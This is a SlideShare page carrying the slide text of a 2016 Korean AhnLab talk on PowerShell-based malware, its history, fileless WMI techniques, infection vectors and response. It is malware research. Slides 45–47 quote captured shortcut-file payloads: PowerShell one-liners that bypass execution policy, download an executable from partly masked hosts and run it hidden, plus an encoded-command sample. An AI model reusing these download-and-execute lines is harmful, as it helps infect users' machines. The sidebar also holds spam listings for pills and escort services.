EMBA - Firmware analysis - Black Hat Arsenal USA 2022
EMBA - Firmware analysis - Black Hat Arsenal USA 2022EMBA - Firmware analysis - Black Hat Arsenal USA 2022
EMBA - Firmware analysis - Black Hat Arsenal USA 2022
 
EMBA - Firmware analysis DEFCON30 demolabs USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022EMBA - Firmware analysis DEFCON30 demolabs USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022
 

More from Minseok(Jacky) Cha

백신 프로그램의 원리와 동작 차민석 20151117_security plus 발표판
백신 프로그램의 원리와 동작 차민석 20151117_security plus 발표판백신 프로그램의 원리와 동작 차민석 20151117_security plus 발표판
백신 프로그램의 원리와 동작 차민석 20151117_security plus 발표판
Minseok(Jacky) Cha
 
0과 1의 비밀을 밝히는 악성코드 분석가 차민석 20151117_security plus 발표판
0과 1의 비밀을 밝히는 악성코드 분석가 차민석 20151117_security plus 발표판0과 1의 비밀을 밝히는 악성코드 분석가 차민석 20151117_security plus 발표판
0과 1의 비밀을 밝히는 악성코드 분석가 차민석 20151117_security plus 발표판
Minseok(Jacky) Cha
 

More from Minseok(Jacky) Cha (16)

2017년 3분기 정보보안 소식 20180107 차민석
2017년 3분기 정보보안 소식 20180107 차민석2017년 3분기 정보보안 소식 20180107 차민석
2017년 3분기 정보보안 소식 20180107 차민석
 
Targeted attacks on major industry sectors in south korea 20171201 cha minseo...
Targeted attacks on major industry sectors in south korea 20171201 cha minseo...Targeted attacks on major industry sectors in south korea 20171201 cha minseo...
Targeted attacks on major industry sectors in south korea 20171201 cha minseo...
 
Targeted attacks on major industry sectores in south korea 20170927 cha minse...
Targeted attacks on major industry sectores in south korea 20170927 cha minse...Targeted attacks on major industry sectores in south korea 20170927 cha minse...
Targeted attacks on major industry sectores in south korea 20170927 cha minse...
 
2017년 1분기 정보보안 소식 20170528 차민석_공개판
2017년 1분기 정보보안 소식 20170528 차민석_공개판2017년 1분기 정보보안 소식 20170528 차민석_공개판
2017년 1분기 정보보안 소식 20170528 차민석_공개판
 
2016년 4분기 주요 정보보안 소식 20170101 차민석_공개판
2016년 4분기 주요 정보보안 소식 20170101 차민석_공개판2016년 4분기 주요 정보보안 소식 20170101 차민석_공개판
2016년 4분기 주요 정보보안 소식 20170101 차민석_공개판
 
2016년 3분기 주요 정보보안 소식 20161227 차민석_공개판
2016년 3분기 주요 정보보안 소식 20161227 차민석_공개판2016년 3분기 주요 정보보안 소식 20161227 차민석_공개판
2016년 3분기 주요 정보보안 소식 20161227 차민석_공개판
 
사회기반시설 공격 동향 분석보고서 차민석 20161029_레몬 정보보호 세미나
사회기반시설 공격 동향 분석보고서 차민석 20161029_레몬 정보보호 세미나사회기반시설 공격 동향 분석보고서 차민석 20161029_레몬 정보보호 세미나
사회기반시설 공격 동향 분석보고서 차민석 20161029_레몬 정보보호 세미나
 
2016년 2분기 주요 정보보안 소식 차민석 20160815_공개판
2016년 2분기 주요 정보보안 소식 차민석 20160815_공개판2016년 2분기 주요 정보보안 소식 차민석 20160815_공개판
2016년 2분기 주요 정보보안 소식 차민석 20160815_공개판
 
2016년 1분기 주요 정보보안 소식 차민석 20160703_공개판
2016년 1분기 주요 정보보안 소식 차민석 20160703_공개판2016년 1분기 주요 정보보안 소식 차민석 20160703_공개판
2016년 1분기 주요 정보보안 소식 차민석 20160703_공개판
 
2015년 4분기 주요 정보보안 소식 차민석 20160410_공개판
2015년 4분기 주요 정보보안 소식 차민석 20160410_공개판2015년 4분기 주요 정보보안 소식 차민석 20160410_공개판
2015년 4분기 주요 정보보안 소식 차민석 20160410_공개판
 
2015년 3분기 주요 정보보안 소식 차민석 20160117_공개판
2015년 3분기 주요 정보보안 소식 차민석 20160117_공개판2015년 3분기 주요 정보보안 소식 차민석 20160117_공개판
2015년 3분기 주요 정보보안 소식 차민석 20160117_공개판
 
Csi cyber season 1 episode 1 차민석 20160113
Csi cyber season 1 episode 1 차민석 20160113Csi cyber season 1 episode 1 차민석 20160113
Csi cyber season 1 episode 1 차민석 20160113
 
백신 프로그램의 원리와 동작 차민석 20151117_security plus 발표판
백신 프로그램의 원리와 동작 차민석 20151117_security plus 발표판백신 프로그램의 원리와 동작 차민석 20151117_security plus 발표판
백신 프로그램의 원리와 동작 차민석 20151117_security plus 발표판
 
0과 1의 비밀을 밝히는 악성코드 분석가 차민석 20151117_security plus 발표판
0과 1의 비밀을 밝히는 악성코드 분석가 차민석 20151117_security plus 발표판0과 1의 비밀을 밝히는 악성코드 분석가 차민석 20151117_security plus 발표판
0과 1의 비밀을 밝히는 악성코드 분석가 차민석 20151117_security plus 발표판
 
2015년 2분기 주요 정보보안 소식 차민석 공개판_20150810
2015년 2분기 주요 정보보안 소식 차민석 공개판_201508102015년 2분기 주요 정보보안 소식 차민석 공개판_20150810
2015년 2분기 주요 정보보안 소식 차민석 공개판_20150810
 
2015년 1분기 주요 정보보안 소식 20150512 공개판
2015년 1분기 주요 정보보안 소식 20150512 공개판2015년 1분기 주요 정보보안 소식 20150512 공개판
2015년 1분기 주요 정보보안 소식 20150512 공개판
 

Recently uploaded

+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
UiPathCommunity
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
WSO2
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Victor Rentea
 

Recently uploaded (20)

How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 

Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판

  • 1. PowerMalware ?! 2016.11.18 – 공개판 안랩 시큐리티대응센터(ASEC) 분석팀 차민석 (車珉錫, CHA Minseok, Jacky Cha, mstoned7) 책임 연구원 PowerShell 를 이용한 악성코드와 기법
  • 2. © AhnLab, Inc. All rights reserved. 2 :~$whoami Profile − 차민석 (車珉錫, CHA Minseok, Jacky Cha, mstoned7) − 1988년 1월 7일 : Apple ][+ 복제품으로 컴퓨터 시작 − 1989년 : Brain virus 변형 감염 − 1997년 : AhnLab 입사 − AhnLab 책임 연구원 (Senior Malware Researcher) − 시큐리티 대응센터(ASEC) 분석팀에서 악성코드 분석 및 연구 중 - 민간합동 조사단, 사이버보안 전문단 - vforum, AVED, AMTSO 멤버 - Wildlist Reporter
  • 3. © AhnLab, Inc. All rights reserved. 3 :~$whoami • 책 -보안에미쳐라(2016) * Source:http://www.yes24.com/24/goods/29333992
  • 4. © AhnLab, Inc. All rights reserved. 4 시작하기 전에 • 보안이 완벽한 시스템은 이 세상에 없어 - MatthewBroderick주연위험한게임(WarGames) * Source:WarGames(1983)
  • 5. © AhnLab, Inc. All rights reserved. 5 Wrap up • PowerShell를 이용한 악성코드 증가 - Windows7와Windows10점유율에따름 -보통RansomwareDownloader로이용 -TargetedAttack에도이용시작포착 • WMI 이용 -Fileless악성코드제작가능 • 전망 -JS,VBS와함께PowerShell악성코드증가예상 -Multi-Platform악성코드가능성
  • 8. © AhnLab, Inc. All rights reserved. 8 PowerShell • PowerShell - 2006년공개된ScriptLanguage -WindowsVista이후기본탑재 * Source:https://msdn.microsoft.com/en-us/powershell
  • 9. © AhnLab, Inc. All rights reserved. 9 Windows Management Instrumentation (WMI) • WMI - * Source:https://msdn.microsoft.com/en-us/library/aa394582(v=vs.85).aspx
  • 10. © AhnLab, Inc. All rights reserved. 10 Windows Management Instrumentation (WMI) • WMIArchitecture - * Source:http://oversitesentry.com/blackhat-presentation-wmi-architecture-used-to-attack/
  • 11. © AhnLab, Inc. All rights reserved. 11 PowerShell + WMI • AntiVirus제품 정보 얻기 - get-wmiobject -Namespace rootSecurityCenter2 -Class AntiVirusProduct
  • 12. © AhnLab, Inc. All rights reserved. 12 PowerShell + WMI • 가상환경 검사 - Get-WmiObject –Class Win32_ComputerSystem
  • 14. © AhnLab, Inc. All rights reserved. Timeline Monad 발표 1993 1998 2000 2004 2006 2007 2013 2014 2015 Poweliks 2016 PowerShell 공개 PowerShell + Macro 등장 VB Script 악성코드 PowerShell Downloader 범람 PowerShell 악성코드 POC Macro virus 2017 Loveletter PowerShell Ransomware Kovter 향상된 Batch virus BedepPhase WMI 이용한 Fileless 침해사고
  • 15. © AhnLab, Inc. All rights reserved. 15 1995 – Macro virus • 1995년 – 2001년: Macro virus전성기 - * Source:
  • 16. © AhnLab, Inc. All rights reserved. 16 2000 - Loveletter • 2000년 5월 4일 LoveLettervirus - email로전파 -Iloveyou라는메일제목의사회공학기법사용 -그림,음악파일파괴
  • 17. © AhnLab, Inc. All rights reserved. 17 2004 – Monad • 우려 - 2004년Monad개발 * Source:https://www.virusbulletin.com/conference/vb2004/abstracts/return-script-viruses
  • 18. © AhnLab, Inc. All rights reserved. 18 2006 - PowerShell 악성코드 POC • PowerShellPOC 악성코드 - * Source:https://www.symantec.com/security_response/writeup.jsp?docid=2006-080216-3625-99&tabid=2
  • 19. © AhnLab, Inc. All rights reserved. 19 2006 - PowerShell Released • PowerShellReleased - * Source:http://www.symantec.com/connect/ru/blogs/powershell-released?page=1
  • 20. © AhnLab, Inc. All rights reserved. 20 2013 – PowerShell Ransomware • PowerShellRansomware등장 - * Source:https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/
  • 21. © AhnLab, Inc. All rights reserved. 21 2014 - Poweliks • Poweliks -Registry내저장 * Source:http://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/
  • 22. © AhnLab, Inc. All rights reserved. 22 2014 - Phase • Phase -2013년발견된Solarbot변형 * Source:http://blog.trendmicro.com/trendlabs-security-intelligence/without-a-trace-fileless-malware-spotted-in-the-wild/
  • 23. © AhnLab, Inc. All rights reserved. 23 2015 – WMI 악용 • Black Hat2015 - * Source:https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A- Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf
  • 24. © AhnLab, Inc. All rights reserved. 24 2015 - PowerShell 악성코드 증가 시작 • PowerShell악성코드 증가 - * Source:https://securelist.com/blog/research/72417/the-rise-of-net-and-powershell-malware/
  • 25. © AhnLab, Inc. All rights reserved. 25 2016 - Macro + PowerShell • Macro + PowerShell - * Source:http://researchcenter.paloaltonetworks.com/2016/03/powersniff-malware-used-in-macro-based-attacks/
  • 26. © AhnLab, Inc. All rights reserved. 26 2016 - PowerShell 이용한 악성코드 유행 • PowerShell이용한 악성코드 유행 - * Source:https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/
  • 28. © AhnLab, Inc. All rights reserved. In-the-Wild 악성코드 조건 조건 많은 사용자 보안 체계 허점 손쉬운 제작
  • 29. © AhnLab, Inc. All rights reserved. PowerShell 악성코드 장점 장점 강력한 기능 손쉬운 제작 행위 기반 제품 우회 가능성
  • 30. © AhnLab, Inc. All rights reserved. 30 주요 감염 경로 • 주요 감염 경로 Mail − 첨부 파일 혹은 Link icon Web Browser − Exploit Kit 이용 − Fileless 악성코드 감염에도 이용
  • 31. © AhnLab, Inc. All rights reserved. 31 감염 경로 • Mail -
  • 32. © AhnLab, Inc. All rights reserved. 32 PowerShell 실행 • 실행 권한 - DownloadFile명령의개별명령과스크립트실행테스트 -개별명령은실행되지만스크립트는정책상실행되지않음
  • 33. © AhnLab, Inc. All rights reserved. 33 PowerShell 실행 • Bypass PowerShell executionpolicies - * Source:https://technet.microsoft.com/en-us/library/ee176847.aspx
  • 34. © AhnLab, Inc. All rights reserved. 34 PowerShell 실행 • Bypass PowerShell executionpolicies - * Source:http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html
  • 35. © AhnLab, Inc. All rights reserved. 35 기능 • Downloader혹은 Dropper - * Source:https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/
  • 37. © AhnLab, Inc. All rights reserved. 종류 종류 Office (DOC, DOCM, XLS, XLSM) Shortcut (LNK) PowerShell (PS1) Windows ScriptFile (WSF), HTML Application (HTA) Java Script /Visual Basic Script (JS, JSE, VBS, VBE, WSF, HTA)
  • 38. © AhnLab, Inc. All rights reserved. 38 Java Script - JS • JavaScript(JS) -
  • 39. © AhnLab, Inc. All rights reserved. 39 Visual Basic Script • VisualBasicScript(VBS) -
  • 40. © AhnLab, Inc. All rights reserved. 40 Windows Script File (WSF) • WSF(WindowsScriptFile) - 대부분JavaScript
  • 41. © AhnLab, Inc. All rights reserved. 41 Windows Script File (WSF) • WSF(WindowsScriptFile) -
  • 42. © AhnLab, Inc. All rights reserved. 42 HTMLApplication (HTA) • HTMLApplication(HTA) -대부분JavaScript
  • 43. © AhnLab, Inc. All rights reserved. 43 Office (DOC, DOCM, XLS, XLSM) • Macro 포함 문서 -
  • 44. © AhnLab, Inc. All rights reserved. 44 Shortcut (LNK) • LNK -
  • 45. © AhnLab, Inc. All rights reserved. 45 Shortcut (LNK) • Download - %WINDIR%System32WindowsPowerShellv1.0powershell.exe $cmd = 'Start-Process';$b = '%TEMP%tes'+'t3.e'+'xe'; $a = New-Object System.Net.WebClient; $a.DownloadFile('http://*****ennox.com/wp-includes/putty.exe','%TEMP%tes'+'t3.e'+'xe'); &($cmd) -FilePath $b;
  • 46. © AhnLab, Inc. All rights reserved. 46 Shortcut (LNK) • Download - C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://dire****.com/2D2A/bg.exe','%APPDATA%Example.exe'); cmd /c '%APPDATA%Example.exe'
  • 47. © AhnLab, Inc. All rights reserved. 47 Shortcut (LNK) • Encoding - C:WindowsSysWOW64WindowsPowerShellv1.0powershell.exe powershell.exe -EncodedCommand UABvAHc………
  • 48. © AhnLab, Inc. All rights reserved. 48 PowerShell (PS1) • PowerShell -
  • 50. © AhnLab, Inc. All rights reserved. 50 Fileless • FilelessTechnique으로이용 -Poweliks * Source:https://blog.gdatasoftware.com/2014/07/23947-poweliks-the-persistent-malware-without-a-file
  • 51. © AhnLab, Inc. All rights reserved. 51 Fileless • FilelessTechnique으로이용 -Poweliks
  • 52. © AhnLab, Inc. All rights reserved. 52 Fileless 악성코드 • Kovter - Run항목읽을수없음
  • 53. © AhnLab, Inc. All rights reserved. 53 Fileless 악성코드 • Kovter -mshta.exe를통해Script실행
  • 54. © AhnLab, Inc. All rights reserved. 54 Fileless 악성코드 • Kovter -인코딩된데이터
  • 57. © AhnLab, Inc. All rights reserved. 57 Error • WindowsPowerShell작동 중지 - 갑자기WindowsPowerShell에러가발생할수있음
  • 58. © AhnLab, Inc. All rights reserved. 58 Response • WMI for Detectionand Response - * Source:https://ics-cert.us-cert.gov/sites/default/files/documents/WMI_for_Detection_and_Response_S508C.pdf
  • 59. © AhnLab, Inc. All rights reserved. 59 전망 • PowerShell의확장 - * Source:https://blogs.msdn.microsoft.com/powershell/2016/08/18/powershell-on-linux-and-open-source-2
  • 60. © AhnLab, Inc. All rights reserved. 전망 전망 JS, VBS 대체 ?! Obfuscation Cross-Platform
  • 61. © AhnLab, Inc. All rights reserved. 61 Wrap up • PowerShell를 이용한 악성코드 증가 - Windows7와Windows10점유율에따름 -보통RansomwareDownloader로이용 -TargetedAttack에도이용시작포착 • WMI 이용 -Fileless악성코드제작가능 • 전망 -JS,VBS와함께PowerShell악성코드증가예상 -Multi-Platform악성코드가능성
  • 62. © AhnLab, Inc. All rights reserved. 62 현재의 보안 문제 • Not reallya fair fight * source:http://image-store.slidesharecdn.com/81268b95-5c3b-4604-9129-d83ab3dc4600-large.png
  • 63. © AhnLab, Inc. All rights reserved. 63 현재의 보안 문제 • 모두가 함께 해야 하는 보안 * source:http://www.security-marathon.be/?p=1786
  • 64. © AhnLab, Inc. All rights reserved. 64 Q&A email : minseok.cha@ahnlab.com / mstoned7@gmail.com http://xcoolcat7.tistory.com https://twitter.com/xcoolcat7, https://twitter.com/mstoned7
  • 65. © AhnLab, Inc. All rights reserved. 65 Reference • Ryan Kazanciyan& Matt Hastings,‘InvestigatingPowerShellAttack’,2014 • Matt Graeber, ‘Abusing WindowsManagementInstrumentation(WMI) to Builda Persistent, Asyncronous,andFilelessBackdoor’,2015 • Santiago M.Pontiroli &F. Roberto Martinez, ‘TheTao of .NETand PowerShellMalwareAnalysis’,2015 • 김승훈/AhnLab,‘매크로 다운로더 분석’, 2016